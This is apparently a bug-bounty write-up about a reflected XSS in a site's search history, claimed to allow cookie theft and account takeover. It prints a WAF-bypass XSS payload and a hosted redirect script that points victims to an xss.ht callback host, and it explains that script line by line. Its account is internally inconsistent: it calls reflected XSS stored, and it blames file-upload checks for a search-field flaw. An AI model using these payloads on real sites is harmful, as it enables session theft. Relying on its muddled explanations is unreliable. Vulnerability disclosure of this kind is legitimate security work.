.png)
11 months ago
61 BOOK THIS SPACE FOR AD
ARTICLE ADSummary :
In brief, reflected (persistent) cross-site scripting (XSS) happens when an attacker injects malicious code into the target application and this content is permanently stored. Later, when victims visit a page with the stored malicious code, their browsers execute this code.
Description :
At first, we tried to inject a general payload but didn’t work due to wfa and after working on we noticed that the search item is shown on the search history after putting some serious look we could find we have a reflected xss where we could send the malicious link containing our payload on URL and when the victim tries to search anything xss triggers and get his account cookies. if he have saved his credit card deals we could easily buy e coupons and gift card with account ;-
After some attempts, I successfully made a script to open redirect with a malicious URL
— ‘“><button onclick=”alert(document.write(‘<iframe src=https://brutelogic.com.br/xss-waf.php></iframe>'))">CLICK ME</button>
OR,
The Script Used (Hosted on our server):
<html>
<body>
<script language=’javascript’ type=’text/javascript’>
try {
var rurl = ‘https://00eth0.xss.ht?&';
window.top.location.replace(rurl);
} catch(exception) {
document.write(“This page has moved, <A HREF=’http://ww6.gsrtc.com?&&jserror=1'>Click here</A> to go there.”);
}
</script>
</body>
</html>
Breaking the Code:
The <html> and <body> tags define the HTML structure and content of the page.The <script> tag defines a block of JavaScript code that is executed by the web browser. The language attribute specifies that the code is written in the JavaScript language, and the type attribute specifies that the code is of type text/javascript.The try block contains a JavaScript function that attempts to execute the following code:a. The variable rurl is set to the value ‘https://00eth0.xss.ht?&’.
b. The window.top.location.replace(rurl) code replaces the current web page’s location with the URL stored in the rurl variable, effectively redirecting the user to the website at https://00eth0.xss.ht.
4. If an exception is caught in the try block (i.e., if the code in the try block fails to execute), the catch block is executed instead. In this case, the document.write() function is used to display a message on the web page that says “This page has moved, Click here to go there.” The A HREF attribute of the hyperlink points to the URL http://ww6.gsrtc.com?&&jserror=1, which is the destination website that the user is redirected to if the code in the try block fails.
Overall, this code was attempting to redirect the user to the website at https://00eth0.xss.ht. If this redirection fails, the user is redirected to another website at http://ww6.gsrtc.com?&&jserror=1.
Why this happened?
In my opinion, it happened because of three reasons
While uploading the file, the extension was not being checkedAfter the file was uploaded, Content-Type validation was not doneAfter the file was sent to the server, it was not validated by the serverImpact :
An attacker can steal the authentication token of any user and can craft different attacks like csrf, session attacks, account take over etc.
The impact depends on what kind of information was being stored in localStorage.
Calculated CVSS :
Vector String : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
Score — 8.2 (High)
Mitigation :
The website should allow keep the waf on the search and other place where the payload could be injected check should be performed to mitigate this kind of issue.
Bounty Reward :
2K USD
Bengali (Bangladesh) · 
English (United States) ·